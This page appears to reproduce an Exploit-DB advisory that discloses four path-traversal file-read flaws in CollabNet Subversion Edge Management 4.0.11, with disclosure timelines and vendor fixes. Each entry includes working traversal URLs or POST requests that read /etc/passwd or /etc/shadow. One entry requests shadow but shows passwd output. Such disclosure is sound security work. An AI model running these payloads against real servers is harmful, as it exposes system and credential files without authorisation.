CollabNet Subversion Edge Management 4.0.11 – Local File Inclusion

• Exploit Database
• 106 阅读

• 作者： otr
  日期： 2015-06-30
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/37442/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205

  # Vuln Title: Local file inclusion in CollabNet Subversion Edge Management # Frontend via logfile "fileName" parameter of the "tail" action # # Date: 28.06.2015 # Author: otr # Software Link: https://www.open.collab.net/downloads/svnedge # Vendor: CollabNet # Version: 4.0.11 # Tested on: Fedora Linux # Type: Local file inclusion # # Risk: Medium # Status: public/fixed # Fixed version: 5.0   Timeline:   2014-10-09 Flaw Discovered 2014-10-20 Vendor contacted 2014-10-21 Vendor response 2014-12-08 Vendor fix proposal 2014-12-08 Extension of embargo to 19.4.2015 2015-05-04 Extension of embargo until release of version 5.0 2015-05-18 Release of version 5.0 and public disclosure   Summary:   The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile "fileName" parameter of the "tail" action   Vulnerability:   Sample URL: https://example.com:4434/csvn/log/tail?fileName=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&startIndex=0   Fix proposal:   Remove feature or santizes the fileName parameter so that no path traversals and arbitrary file inclusions are possible.   Vendor fix:   [...] now allow only showing hooks/logs within the intended directories.   ####################################################################   # Vuln Title: Local file inclusion in CollabNet Subversion Edge Management # Frontend via logfile "listViewItem" parameter of the "index" action # # Date: 28.06.2015 # Author: otr # Software Link: https://www.open.collab.net/downloads/svnedge # Vendor: CollabNet # Version: 4.0.11 # Tested on: Fedora Linux # Type: Local file inclusion # # Risk: Medium # Status: public/fixed # Fixed version: 5.0   Timeline:   2014-10-09 Flaw Discovered 2014-10-20 Vendor contacted 2014-10-21 Vendor response 2014-12-08 Vendor fix proposal 2014-12-08 Extension of embargo to 19.4.2015 2015-05-04 Extension of embargo until release of version 5.0 2015-05-18 Release of version 5.0 and public disclosure   Summary:   The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile "listViewItem" parameter of the "index" action   Vulnerability:   Request: POST /csvn/repo/index HTTP/1.1 Host: example.com:4434 [...]   id=1&datatable_length=10&listViewItem_../../../../../../etc/passwd=on&_confirmDialogText_copyHook=&_confirmDialogText_renameHook=&_action_downloadHook=Download   Response:   HTTP/1.1 200 OK Content-Type: text/plain Content-disposition: attachment;filename="../../../../../../etc/passwd" Content-Length: 1825   root:x:0:0:root:/root:/bin/bash   Fix proposal:   Remove feature or santizes the "listViewItem" parameter so that no path traversals and arbitrary file inclusions are possible.   Vendor fix:   [...] now allow only showing hooks/logs within the intended directories.   ####################################################################   # Vuln Title: Local file inclusion in CollabNet Subversion Edge Management # Frontend via "fileName" parameter of the show action # # Date: 10.10.2014 # Author: otr # Software Link: https://www.open.collab.net/downloads/svnedge # Vendor: CollabNet # Version: 4.0.11 # Tested on: Fedora Linux # Type: Local file inclusion # # Risk: Medium # Status: public/fixed # Fixed version: 5.0   Timeline:   2014-10-09 Flaw Discovered 2014-10-20 Vendor contacted 2014-10-21 Vendor response 2014-12-08 Vendor fix proposal 2014-12-08 Extension of embargo to 19.4.2015 2015-05-04 Extension of embargo until release of version 5.0 2015-05-18 Release of version 5.0 and public disclosure   Summary:   The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile "fileName" parameter of the show action   Vulnerability:   Request: GET /csvn/log/show?fileName=../../../../../../etc/shadow HTTP/1.1 Host: example.com:4434   Response: HTTP/1.1 200 OK [...] <div class="span3">../../../../../../etc/passwd</div> [...] root:x:0:0:root:/root:/bin/bash   Fix proposal:   Remove feature or santizes the fileName parameter so that no path traversals and arbitrary file inclusions are possible.   Vendor fix:   [...] now allow only showing hooks/logs within the intended directories.   ####################################################################   # Vuln Title: Local file inclusion in CollabNet Subversion Edge Management # Frontend via logfile "filename" parameter of the "downloadHook" action # # Date: 28.06.2015 # Author: otr # Software Link: https://www.open.collab.net/downloads/svnedge # Vendor: CollabNet # Version: 4.0.11 # Tested on: Fedora Linux # Type: Local file inclusion # # Risk: Medium # Status: public/fixed # Fixed version: 5.0   Timeline:   2014-10-09 Flaw Discovered 2014-10-20 Vendor contacted 2014-10-21 Vendor response 2014-12-08 Vendor fix proposal 2014-12-08 Extension of embargo to 19.4.2015 2015-05-04 Extension of embargo until release of version 5.0 2015-05-18 Release of version 5.0 and public disclosure   Summary:   The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via logfile "filename" parameter of the "downloadHook" action   Vulnerability:   Example URL: https://example.com:4434/csvn/repo/downloadHook/1?filename=../../../../../../etc/passwd   Fix proposal:   Remove feature or santizes the "filename" parameter so that no path traversals and arbitrary file inclusions are possible.   Vendor fix:   [...] now allow only showing hooks/logs within the intended directories.